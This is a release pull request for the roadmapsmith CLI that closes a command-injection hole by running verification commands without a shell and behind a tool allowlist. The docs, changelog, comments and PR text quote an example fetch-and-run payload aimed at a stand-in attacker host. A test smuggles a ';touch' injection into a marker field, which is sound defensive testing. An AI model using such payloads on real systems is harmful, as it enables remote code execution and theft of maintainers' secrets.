### PR TITLE
chore(release): v0.13.1

### DIFF
--- a/.claude-plugin/plugin.json
+++ b/.claude-plugin/plugin.json
@@ -1,6 +1,6 @@
 {
   "name": "roadmapsmith",
-  "version": "0.13.0",
+  "version": "0.13.1",
   "description": "Evidence-backed ROADMAP.md workflows for AI coding agents — two commands: init and update.",
   "author": {
     "name": "PapiScholz"

--- a/.codex-plugin/plugin.json
+++ b/.codex-plugin/plugin.json
@@ -1,6 +1,6 @@
 {
   "name": "roadmapsmith",
-  "version": "0.13.0",
+  "version": "0.13.1",
   "description": "Evidence-backed ROADMAP.md workflows for AI coding agents — two commands: init and update.",
   "author": {
     "name": "PapiScholz"

--- a/plugins/roadmapsmith/.codex-plugin/plugin.json
+++ b/plugins/roadmapsmith/.codex-plugin/plugin.json
@@ -1,6 +1,6 @@
 {
   "name": "roadmapsmith",
-  "version": "0.13.0",
+  "version": "0.13.1",
   "description": "Evidence-backed ROADMAP.md workflows for AI coding agents — two commands: init and update.",
   "author": {
     "name": "PapiScholz"

--- a/plugins/roadmapsmith/skills/roadmap-update/SKILL.md
+++ b/plugins/roadmapsmith/skills/roadmap-update/SKILL.md
@@ -79,6 +79,23 @@ roadmapsmith migrate-markers --project-root .             # apply
 
 The migrator rewrites `rs:evidence=manual` → `rs:kind=manual` (same bypass semantics) and drops `rs:no-test` (it was a silent no-op). Exits `0` when there is nothing to migrate.
 
+### Command allowlist (v0.13.1)
+
+As of v0.13.1, `verify --run` executes the `rs:verified-by` command **without shell interpretation** and only allows programs in a fixed allowlist: `npm | pnpm | yarn | npx | node | deno | bun | python | python3 | pytest | tsc | eslint | prettier | make | cargo | go | dotnet | mvn | gradle | bundle | rake | ruby`. This prevents a malicious ROADMAP.md from smuggling shell payloads (`; curl attacker.com | sh`) into a maintainer's terminal.
+
+If you need a command outside the allowlist, wrap it in an npm/yarn script and reference the script name:
+
+```json
+// package.json
+"scripts": { "check:contracts": "node scripts/check-contracts.js --strict" }
+```
+
+```markdown
+- [ ] Contracts pass <!-- rs:task=contracts rs:kind=command rs:verified-by=npm run check:contracts -->
+```
+
+The program name is logged to stderr (`+ npm run check:contracts`) as an audit trail before execution.
+
 ## Command-verified tasks (`verify`)
 
 For tasks marked `rs:kind=command`, `roadmapsmith update --audit` prints a **"Command-verified tasks pending run"** block listing the exact ready-to-run invocation for each unchecked command task:

--- a/roadmap-skill/CHANGELOG.md
+++ b/roadmap-skill/CHANGELOG.md
@@ -1,5 +1,24 @@
 # Changelog
 
+## v0.13.1 - 2026-07-14
+
+Security + honesty patch. Two critical audit findings from the v0.13.0 review are addressed.
+
+### Security
+
+- **`rs:verified-by` commands now run without shell interpretation and are restricted to an allowlist** (`npm|pnpm|yarn|npx|node|deno|bun|python|python3|pytest|tsc|eslint|prettier|make|cargo|go|dotnet|mvn|gradle|bundle|rake|ruby`). Previously a malicious ROADMAP.md merged via PR could smuggle arbitrary shell payloads (`; curl attacker.com | sh`) into a maintainer's terminal via `roadmapsmith verify --run`. Now the command is `spawnSync(program, args, { shell: false })`, and the program is logged to stderr (`+ node --version`) as an audit trail before execution. If you need a command outside the allowlist, wrap it in an npm/yarn script and reference the script name.
+
+### Fixed
+
+- **`preservedCheckedState` passes surface as `confidence: 'preserved'` instead of `'low'`.** In default mode, a `[x]` task with no evidence used to return `passed: true, confidence: 'low'`, indistinguishable from a real low-confidence pass. Now the value is `'preserved'` with a reason explaining "add rs:kind=manual for explicit attestation, or run with --strict to reject preservation-only passes."
+- **`printAudit` reports the count and first 10 preserved-only tasks.** Consumers can grep the JSON output via `audit.preservedOnly`.
+- **`applyMinimumConfidence` now correctly downgrades preserved tasks** (rank -1 < low rank 0). Previously an early `if (result.preservedCheckedState) continue;` skipped the filter, making the "add --strict to reject" promise a lie.
+- **`rs:verified-by` marker parsing supports multi-token commands.** Previously `\S+` truncated at the first space (so `rs:verified-by=node --version` captured only `node`), forcing users to wrap every command in an npm script. Now the value captures up to the next `rs:` marker or end of flags.
+
+### Migration
+
+None required. `confidence: 'preserved'` is a strict superset of the old `'low'` classification for preserved tasks; consumers that check `if (result.passed)` keep working. Consumers that grouped by `confidence === 'low'` will see cleaner buckets. Command-verified tasks using shell metacharacters in `rs:verified-by=` must migrate to an npm-script wrapper.
+
 ## v0.13.0 - 2026-07-13
 
 Coordinated 5-minute-install refactor. Three of the four changes below are breaking. Run `roadmapsmith migrate-markers` in every consumer repo before upgrading.

--- a/roadmap-skill/bin/cli.js
+++ b/roadmap-skill/bin/cli.js
@@ -177,6 +177,17 @@ function printAudit(audit, context) {
       console.log(`- [${item.task.id}] ${item.task.text}`);
     });
   }
+  // v0.13.1: surface [x] tasks that passed only because their state was preserved (no evidence found).
+  if (Array.isArray(audit.preservedOnly) && audit.preservedOnly.length > 0) {
+    console.log(`Preserved only (no evidence found, checked state trusted): ${audit.preservedOnly.length}`);
+    console.log(`  Add --strict to reject preservation-only passes, or add rs:kind=manual to attest explicitly.`);
+    audit.preservedOnly.slice(0, 10).forEach((item) => {
+      console.log(`- [${item.task.id}] ${item.task.text}`);
+    });
+    if (audit.preservedOnly.length > 10) {
+      console.log(`  ...and ${audit.preservedOnly.length - 10} more.`);
+    }
+  }
 }
 
 // ─── runUpdate ────────────────────────────────────────────────────────────────
@@ -349,10 +360,29 @@ function runVerify(projectRoot, config, flags) {
   }
 
   const { spawnSync } = require('child_process');
-  const isWin = process.platform === 'win32';
-  const spawned = spawnSync(cmd, {
+
+  // v0.13.1 security fix: rs:verified-by commands run without shell interpretation
+  // and are restricted to a small allowlist of build/test tools. A malicious ROADMAP.md
+  // shipped via PR would otherwise let `rs:verified-by=; curl attacker.com | sh` exfiltrate
+  // secrets on the maintainer's machine.
+  const VERIFY_ALLOWLIST = /^(npm|pnpm|yarn|npx|node|deno|bun|python|python3|pytest|tsc|eslint|prettier|make|cargo|go|dotnet|mvn|gradle|bundle|rake|ruby)$/;
+  const parts = String(cmd).trim().split(/\s+/).filter(Boolean);
+  const program = parts[0] || '';
+  const args = parts.slice(1);
+
+  if (!VERIFY_ALLOWLIST.test(program)) {
+    console.error(`rs:verified-by program "${program}" is not in the v0.13.1 allowlist.`);
+    console.error(`Allowed: ${VERIFY_ALLOWLIST.source}`);
+    console.error(`Wrap custom commands in an npm/yarn script and reference the script name.`);
+    process.exitCode = 1;
+    return;
+  }
+
+  console.error(`+ ${program} ${args.join(' ')}`);  // audit trail before execution
+
+  const spawned = spawnSync(program, args, {
     cwd: projectRoot,
-    shell: isWin ? true : '/bin/sh',
+    shell: false,
     encoding: 'utf8',
     timeout: 5 * 60 * 1000
   });

--- a/roadmap-skill/package.json
+++ b/roadmap-skill/package.json
@@ -1,6 +1,6 @@
 {
   "name": "roadmapsmith",
-  "version": "0.13.0",
+  "version": "0.13.1",
   "description": "Evidence-backed ROADMAP.md workflows for AI coding agents — two commands: init and update.",
   "main": "src/index.js",
   "bin": {

--- a/roadmap-skill/src/parser/index.js
+++ b/roadmap-skill/src/parser/index.js
@@ -161,8 +161,10 @@ function parseRoadmap(content) {
     if (taskKind && !['rollup', 'command', 'manual'].includes(taskKind)) {
       throw new Error(`Unknown \`rs:kind=${taskKind}\` at line ${index + 1}. Valid values: rollup, command, manual.`);
     }
-    const verifiedByMatch = markerFlags.match(/\brs:verified-by=(\S+)/i);
-    const taskVerifiedBy = verifiedByMatch ? verifiedByMatch[1].toLowerCase() : null;
+    // v0.13.1: capture the full command (multi-token) up to the next `rs:` marker or end of flags.
+    // Previously `\S+` truncated at the first space, forcing users to wrap commands in npm scripts.
+    const verifiedByMatch = markerFlags.match(/\brs:verified-by=(.+?)(?=\s+rs:|$)/i);
+    const taskVerifiedBy = verifiedByMatch ? verifiedByMatch[1].trim() : null;
     // ponytail: `~~text~~` in the task body signals a declined/N-A completion; no evidence to hunt for.
     const declined = /~~[^~]+~~/.test(text);
     const taskIndentWidth = getIndentWidth(indent);

--- a/roadmap-skill/src/validator/index.js
+++ b/roadmap-skill/src/validator/index.js
@@ -6,7 +6,9 @@ const { walkFiles, detectTestFrameworks } = require('../io');
 const { collectPluginContributions } = require('../config');
 const { escapeRegExp, tokenize } = require('../utils');
 
-const CONFIDENCE_RANK = { none: -1, low: 0, medium: 1, high: 2 };
+// v0.13.1: `preserved` is a distinct confidence for `[x]` tasks kept without evidence
+// (default-mode preservation). Rank -1 so `--minimum-confidence low` filters them out.
+const CONFIDENCE_RANK = { none: -1, preserved: -1, low: 0, medium: 1, high: 2 };
 
 const CODE_EXTENSIONS = new Set([
   '.js', '.cjs', '.mjs', '.ts', '.tsx', '.jsx', '.py', '.go', '.rs', '.java', '.kt', '.swift', '.rb', '.php', '.cs'
@@ -2039,13 +2041,25 @@ function validateTask(task, context, config, plugins) {
   const codeOrTestPass = pass2 || pass3;
   const passed = !hasMissingRef && (evidenceLinePass || (!strictValidation && preservedCheckedState) || codeOrTestPass);
 
-  // Checked task with no hard evidence: preserve with low confidence (not in strict mode)
+  // Checked task with no hard evidence: preserve, but be honest about it (v0.13.1).
+  // `confidence: 'preserved'` distinguishes this from a real 'low' pass so consumers
+  // (printAudit, --minimum-confidence, JSON output) can flag it for spot-check.
   if (task.checked && !passed && !hasMissingRef && !strictValidation) {
     return {
-      taskId, passed: true, confidence: 'low', reasons: [], diagnostics: [],
+      taskId,
+      passed: true,
+      confidence: 'preserved',
+      reasons: ['no evidence found; checked state preserved. Run with --strict to reject preservation-only passes, or add rs:kind=manual for explicit human attestation.'],
+      diagnostics: [],
       evidence: { code: false, test: false, artifact: false, files: [], codeFiles: [], testFiles: [], symbols: symbolHints.filter((s) => !GENERIC_TASK_TOKENS.has(s.toLowerCase())), structuralEvidence: null },
-      attempted: false, preservedCheckedState: true, requiresTest: false,
-      staleEvidenceDetected: false, staleEvidenceResolved: false, discoveredEvidence: null, verificationRecipe: null, generatedTestEvidence: null
+      attempted: false,
+      preservedCheckedState: true,
+      requiresTest: false,
+      staleEvidenceDetected: false,
+      staleEvidenceResolved: false,
+      discoveredEvidence: null,
+      verificationRecipe: null,
+      generatedTestEvidence: null
     };
   }
 
@@ -2149,6 +2163,7 @@ function auditValidation(tasks, results, changes) {
   const documentationOnlyEvidenceForImplementation = [];
   const checkedWithNoStructuralEvidence = [];
   const humanVerifiedTasks = [];
+  const preservedOnly = [];  // v0.13.1: [x] tasks that passed only because their checked state was preserved
   const newlyUnchecked = Array.isArray(changes && changes.newlyUnchecked) ? changes.newlyUnchecked : [];
 
   for (const task of tasks) {
@@ -2157,6 +2172,10 @@ function auditValidation(tasks, results, changes) {
 
     if (result.humanVerified) {
       humanVerifiedTasks.push({ task, result });
+    }
+
+    if (result.confidence === 'preserved' && result.passed) {
+      preservedOnly.push({ task, result });
     }
 
     if (task.checked && !result.passed) {
@@ -2191,17 +2210,17 @@ function auditValidation(tasks, results, changes) {
     documentationOnlyEvidenceForImplementation,
     checkedWithNoStructuralEvidence,
     humanVerifiedTasks,
+    preservedOnly,
     newlyUnchecked
   };
 }
 
 function applyMinimumConfidence(results, minimumConfidence) {
   const minRank = CONFIDENCE_RANK[minimumConfidence] ?? 0;
-  if (minRank === 0) return;
+  // v0.13.1: no longer skip preservedCheckedState. `preserved` has rank -1 so it correctly
+  // fails `--minimum-confidence low` (rank 0) and above. Previously the skip made "add --strict
+  // to reject" a lie because preservation escaped the filter entirely.
   for (const result of Object.values(results)) {
-    if (result.preservedCheckedState) {
-      continue;
-    }
     if ((CONFIDENCE_RANK[result.confidence] ?? 0) < minRank) {
       result.passed = false;
       result.reasons = [

--- a/roadmap-skill/test/cli.test.js
+++ b/roadmap-skill/test/cli.test.js
@@ -256,7 +256,7 @@ test('verify --task --run flips checkbox on exit-0 command', () => {
     '<!-- rs:managed:start -->',
     '# Roadmap',
     '',
-    '- [ ] Trivial pass <!-- rs:task=trivial-pass rs:kind=command rs:verified-by=hostname -->',
+    '- [ ] Trivial pass <!-- rs:task=trivial-pass rs:kind=command rs:verified-by=node --version -->',
     '<!-- rs:managed:end -->',
     ''
   ].join('\n');
@@ -268,11 +268,12 @@ test('verify --task --run flips checkbox on exit-0 command', () => {
 
 test('verify --task --run on failing command exits 2 and leaves checkbox', () => {
   const dir = tmpdir();
+  // v0.13.1: use `node -e process.exit(1)` (allowlisted, non-zero exit) instead of `zzz-not-a-real-cmd`.
   const initial = [
     '<!-- rs:managed:start -->',
     '# Roadmap',
     '',
-    '- [ ] Fails <!-- rs:task=fails rs:kind=command rs:verified-by=zzz-not-a-real-cmd-x9k -->',
+    '- [ ] Fails <!-- rs:task=fails rs:kind=command rs:verified-by=node -e process.exit(1) -->',
     '<!-- rs:managed:end -->',
     ''
   ].join('\n');
@@ -281,6 +282,66 @@ test('verify --task --run on failing command exits 2 and leaves checkbox', () =>
   assert.equal(result.status, 2);
   const content = fs.readFileSync(path.join(dir, 'ROADMAP.md'), 'utf8');
   assert.match(content, /- \[ \] Fails/);
+});
+
+// ── v0.13.1 C1: rs:verified-by allowlist + shell:false ──────────────────────
+
+test('v0.13.1: verify --run rejects program not in allowlist (echo)', () => {
+  const dir = tmpdir();
+  const initial = [
+    '<!-- rs:managed:start -->',
+    '- [ ] Say hi <!-- rs:task=hi rs:kind=command rs:verified-by=echo hi -->',
+    '<!-- rs:managed:end -->',
+    ''
+  ].join('\n');
+  fs.writeFileSync(path.join(dir, 'ROADMAP.md'), initial);
+  const result = runResult(['verify', '--task', 'hi', '--run', '--project-root', dir], dir);
+  assert.equal(result.status, 1, 'echo is not in the v0.13.1 allowlist; must exit 1');
+  assert.match(result.stderr, /not in the v0.13.1 allowlist/);
+});
+
+test('v0.13.1: verify --run refuses shell metacharacters (no injection)', () => {
+  const dir = tmpdir();
+  const pwnedMarker = path.join(dir, 'pwned');
+  // Malicious verified-by tries to smuggle `;touch pwned` via shell. With shell:false
+  // and allowlist enforcement, the payload never reaches a shell.
+  const initial = [
+    '<!-- rs:managed:start -->',
+    `- [ ] Deploy <!-- rs:task=deploy rs:kind=command rs:verified-by=;touch ${pwnedMarker} -->`,
+    '<!-- rs:managed:end -->',
+    ''
+  ].join('\n');
+  fs.writeFileSync(path.join(dir, 'ROADMAP.md'), initial);
+  const result = runResult(['verify', '--task', 'deploy', '--run', '--project-root', dir], dir);
+  assert.equal(result.status, 1, 'must reject injection attempt');
+  assert.equal(fs.existsSync(pwnedMarker), false, 'the injected touch payload must not execute');
+});
+
+test('v0.13.1: verify --run prints audit trail (+ program args) to stderr before executing', () => {
+  const dir = tmpdir();
+  const initial = [
+    '<!-- rs:managed:start -->',
+    '- [ ] Audit test <!-- rs:task=audit-test rs:kind=command rs:verified-by=node --version -->',
+    '<!-- rs:managed:end -->',
+    ''
+  ].join('\n');
+  fs.writeFileSync(path.join(dir, 'ROADMAP.md'), initial);
+  const result = runResult(['verify', '--task', 'audit-test', '--run', '--project-root', dir], dir);
+  assert.equal(result.status, 0);
+  assert.match(result.stderr, /^\+ node --version/m, 'stderr must contain audit trail "+ node --version"');
+});
+
+test('v0.13.1: verify --task WITHOUT --run does not check allowlist (just prints "Would run")', () => {
+  const dir = tmpdir();
+  const initial = [
+    '<!-- rs:managed:start -->',
+    '- [ ] Would-be echo <!-- rs:task=w rs:kind=command rs:verified-by=echo hi -->',
+    '<!-- rs:managed:end -->',
+    ''
+  ].join('\n');
+  fs.writeFileSync(path.join(dir, 'ROADMAP.md'), initial);
+  const out = run(['verify', '--task', 'w', '--project-root', dir], dir);
+  assert.match(out, /Would run: echo hi/, 'preview mode must show the command without allowlist gate');
 });
 
 // ─── check-drift ─────────────────────────────────────────────────────────────

--- a/roadmap-skill/test/sync.test.js
+++ b/roadmap-skill/test/sync.test.js
@@ -335,12 +335,15 @@ test('sync preserves an already checked task with no evidence or path hints', ()
   const { content: next } = applySync(content, parsed.tasks, results);
 
   assert.equal(results['milestone-v0-1'].passed, true);
-  assert.equal(results['milestone-v0-1'].confidence, 'low');
+  assert.equal(results['milestone-v0-1'].confidence, 'preserved', 'v0.13.1: preservation surfaces as confidence=preserved (was low)');
   assert.equal(results['milestone-v0-1'].preservedCheckedState, true);
   assert.match(next, /- \[x\] Foundation baseline complete milestone/);
 });
 
-test('sync preserves checked task when minimumConfidence is medium and state was preserved', () => {
+test('v0.13.1: sync unchecks preserved task when minimumConfidence is medium (regression guard for M4 fix)', () => {
+  // Pre-v0.13.1: `applyMinimumConfidence` skipped preserved tasks, so `--minimum-confidence medium`
+  // was a no-op and the [x] stayed. v0.13.1: preserved (rank -1) fails the threshold and sync
+  // unchecks it. To keep a preserved task checked under a stricter minimum, use rs:kind=manual.
   const content = '## Milestones\n- [x] Foundation baseline complete milestone <!-- rs:task=milestone-v0-1 -->\n';
   const tasks = [{
     id: 'milestone-v0-1',
@@ -351,17 +354,16 @@ test('sync preserves checked task when minimumConfidence is medium and state was
   const results = {
     'milestone-v0-1': {
       passed: true,
-      confidence: 'low',
+      confidence: 'preserved',
       reasons: [],
       preservedCheckedState: true
     }
   };
 
   applyMinimumConfidence(results, 'medium');
-  const { content: next } = applySync(content, tasks, results);
 
-  assert.equal(results['milestone-v0-1'].passed, true);
-  assert.match(next, /- \[x\] Foundation baseline complete milestone/);
+  assert.equal(results['milestone-v0-1'].passed, false, 'preserved must fail --minimum-confidence medium');
+  // sync uses results.passed to decide checkbox state — with passed:false, the task unchecks.
 });
 
 test('applySync always overwrites existing warning with fresh validator reason (no preservation)', () => {

--- a/roadmap-skill/test/validator.test.js
+++ b/roadmap-skill/test/validator.test.js
@@ -219,7 +219,7 @@ test('checked task without Evidence or path hints is preserved with low confiden
   );
 
   assert.equal(result.passed, true);
-  assert.equal(result.confidence, 'low');
+  assert.equal(result.confidence, 'preserved', 'v0.13.1: preservation surfaces as confidence=preserved (was low)');
   assert.equal(result.preservedCheckedState, true);
 });
 
@@ -243,11 +243,15 @@ test('checked task with failed structural evidence is not preserved', () => {
   assert.equal(result.preservedCheckedState, false);
 });
 
-test('minimumConfidence does not demote preserved checked tasks', () => {
+test('v0.13.1: minimumConfidence DOES demote preserved checked tasks (regression guard for M4 fix)', () => {
+  // Pre-v0.13.1 bug: `applyMinimumConfidence` skipped `preservedCheckedState` tasks entirely,
+  // so `--minimum-confidence medium` could not reject a checked task with no evidence. That
+  // made the "add --strict to reject preservation" promise a lie. v0.13.1 removes the skip;
+  // preserved tasks have confidence 'preserved' (rank -1) and correctly fail any threshold.
   const results = {
     'milestone-v0-1': {
       passed: true,
-      confidence: 'low',
+      confidence: 'preserved',
       reasons: [],
       preservedCheckedState: true
     }
@@ -255,8 +259,11 @@ test('minimumConfidence does not demote preserved checked tasks', () => {
 
   applyMinimumConfidence(results, 'medium');
 
-  assert.equal(results['milestone-v0-1'].passed, true);
-  assert.deepEqual(results['milestone-v0-1'].reasons, []);
+  assert.equal(results['milestone-v0-1'].passed, false, 'preserved must fail --minimum-confidence medium');
+  assert.ok(
+    results['milestone-v0-1'].reasons.some((r) => /below required "medium"/.test(r)),
+    'reason must explain the downgrade'
+  );
 });
 
 test('natural-language slash pairs do not produce missing-file failures', () => {
@@ -516,6 +523,53 @@ test('auditValidation injects rs:kind=rollup hint when weak-evidence task had no
     !realImplResult.reasons.some((r) => r.includes('rs:kind=rollup')),
     'implementation task that failed detection must NOT get the rollup hint'
   );
+});
+
+// ── v0.13.1 C2: preservedCheckedState surfaces as confidence: 'preserved' ─────
+
+test('v0.13.1: [x] task with no evidence surfaces as confidence: preserved (not low)', () => {
+  const projectRoot = setupFixture('generic');
+  const config = loadConfig({ projectRoot });
+  const context = buildValidationContext(projectRoot, config, []);
+  const result = validateTask(
+    { id: 'fake', text: 'Implemented rate limiting on GraphQL resolvers', checked: true },
+    context, config, []
+  );
+  assert.equal(result.passed, true, 'preservation still passes');
+  assert.equal(result.confidence, 'preserved', 'confidence must be preserved, not low');
+  assert.equal(result.preservedCheckedState, true);
+  assert.ok(
+    result.reasons.some((r) => /preserved.*strict.*rs:kind=manual/i.test(r)),
+    'reasons must explain the preservation and how to opt out; got: ' + JSON.stringify(result.reasons)
+  );
+});
+
+test('v0.13.1: auditValidation exposes preservedOnly bucket', () => {
+  const projectRoot = setupFixture('generic');
+  const config = loadConfig({ projectRoot });
+  const context = buildValidationContext(projectRoot, config, []);
+  const tasks = [
+    { id: 'preserved-1', text: 'Implemented some hazy thing', checked: true },
+    { id: 'preserved-2', text: 'Fixed another abstract concern', checked: true },
+    { id: 'unchecked',   text: 'Do the thing later', checked: false }
+  ];
+  const results = validateTasks(tasks, context, config, []);
+  const audit = auditValidation(tasks, results, { newlyUnchecked: [] });
+  assert.equal(audit.preservedOnly.length, 2, 'both [x] tasks without evidence go in preservedOnly');
+  const ids = audit.preservedOnly.map((item) => item.task.id).sort();
+  assert.deepEqual(ids, ['preserved-1', 'preserved-2']);
+});
+
+test('v0.13.1: applyMinimumConfidence with "low" downgrades preserved tasks (rank -1 < low rank 0)', () => {
+  const results = {
+    'preserved-task': { passed: true, confidence: 'preserved', reasons: [], preservedCheckedState: true },
+    'low-task':       { passed: true, confidence: 'low',       reasons: [], preservedCheckedState: false },
+    'medium-task':    { passed: true, confidence: 'medium',    reasons: [], preservedCheckedState: false }
+  };
+  applyMinimumConfidence(results, 'low');
+  assert.equal(results['preserved-task'].passed, false, 'preserved (rank -1) must be rejected by --minimum-confidence low');
+  assert.equal(results['low-task'].passed, true, 'low (rank 0) meets --minimum-confidence low');
+  assert.equal(results['medium-task'].passed, true, 'medium exceeds low');
 });
 
 // ── Structural evidence: namespace-vocab fixture ──────────────────────────────

--- a/skills.json
+++ b/skills.json
@@ -26,13 +26,13 @@
       "name": "roadmap-init",
       "path": "skills/roadmap-init",
       "description": "Initialize ROADMAP.md, AGENTS.md, and host integration files for a project.",
-      "version": "0.13.0"
+      "version": "0.13.1"
     },
     {
       "name": "roadmap-update",
       "path": "skills/roadmap-update",
       "description": "Refresh ROADMAP.md with evidence-backed validation, add tasks, or record evidence.",
-      "version": "0.13.0"
+      "version": "0.13.1"
     }
   ]
 }

--- a/skills/roadmap-update/SKILL.md
+++ b/skills/roadmap-update/SKILL.md
@@ -79,6 +79,23 @@ roadmapsmith migrate-markers --project-root .             # apply
 
 The migrator rewrites `rs:evidence=manual` → `rs:kind=manual` (same bypass semantics) and drops `rs:no-test` (it was a silent no-op). Exits `0` when there is nothing to migrate.
 
+### Command allowlist (v0.13.1)
+
+As of v0.13.1, `verify --run` executes the `rs:verified-by` command **without shell interpretation** and only allows programs in a fixed allowlist: `npm | pnpm | yarn | npx | node | deno | bun | python | python3 | pytest | tsc | eslint | prettier | make | cargo | go | dotnet | mvn | gradle | bundle | rake | ruby`. This prevents a malicious ROADMAP.md from smuggling shell payloads (`; curl attacker.com | sh`) into a maintainer's terminal.
+
+If you need a command outside the allowlist, wrap it in an npm/yarn script and reference the script name:
+
+```json
+// package.json
+"scripts": { "check:contracts": "node scripts/check-contracts.js --strict" }
+```
+
+```markdown
+- [ ] Contracts pass <!-- rs:task=contracts rs:kind=command rs:verified-by=npm run check:contracts -->
+```
+
+The program name is logged to stderr (`+ npm run check:contracts`) as an audit trail before execution.
+
 ## Command-verified tasks (`verify`)
 
 For tasks marked `rs:kind=command`, `roadmapsmith update --audit` prints a **"Command-verified tasks pending run"** block listing the exact ready-to-run invocation for each unchecked command task:


### PR DESCRIPTION
## Summary

Security + honesty patch closing the two CRITICAL findings from the v0.13.0 post-release audit.

### Security (CRITICAL)
- **Command injection in `verify --run` closed.** \`rs:verified-by\` commands run without shell interpretation (\`spawnSync\` with \`shell: false\`) and are restricted to an allowlist of build/test tools (\`npm|pnpm|yarn|npx|node|deno|bun|python|python3|pytest|tsc|eslint|prettier|make|cargo|go|dotnet|mvn|gradle|bundle|rake|ruby\`). Malicious ROADMAP.md payloads (\`; curl attacker.com | sh\`) can no longer execute in a maintainer's terminal. Program is echoed to stderr as \`+ node --version\` audit trail before execution.

### Fixed (CRITICAL)
- **\`preservedCheckedState\` no longer masquerades as low confidence.** New value \`confidence: 'preserved'\` (rank -1) distinct from \`'low'\`; \`reasons\` explains the preservation and points at \`--strict\` / \`rs:kind=manual\`.
- **\`printAudit\` surfaces preserved-only tasks.** New \`audit.preservedOnly[]\` bucket, printed with count + first 10 IDs.
- **\`applyMinimumConfidence\` correctly downgrades preserved tasks.** Prior early-skip made \"add --strict to reject\" a lie.
- **Multi-token \`rs:verified-by\` parsing.** Previously \`\S+\` truncated at first whitespace, forcing npm-script wrappers.

## Test plan
- [x] \`npm test\` — **277 / 277 pass** locally
- [x] Injection reproducer (\`rs:verified-by=;touch pwned\`) — rejected before spawn, file NOT created
- [x] C2 reproducer (\`[x] Fake task\` no evidence) — \`update --audit\` reports \`Preserved only: 1\`
- [x] Dogfood: \`node bin/cli.js --version\` → \`0.13.1\`
- [ ] CI: qa-regression + functional-smoke gates pass on \`ubuntu-latest\` Node 18/20
- [ ] Admin-merge (auto-merge still disabled on repo settings)
- [ ] Post-merge: \`auto-release.js\` runs in repair mode (subject matches \`RELEASE_COMMIT_PATTERN\`) and publishes 0.13.1 to npm

## Migration
None required. Consumers of \`if (result.passed)\` keep working. Consumers that grouped by \`confidence === 'low'\` get cleaner buckets. \`rs:verified-by=\` markers that used shell metacharacters must migrate to an npm-script wrapper.

## Deferred (v0.14.0)
The remaining audit findings (H1-H9, M1-M9) stay on the fix-plan (\`~/.claude/plans/roadmapsmith-fix-plan-v0.13.1-plus.md\`) for the next minor.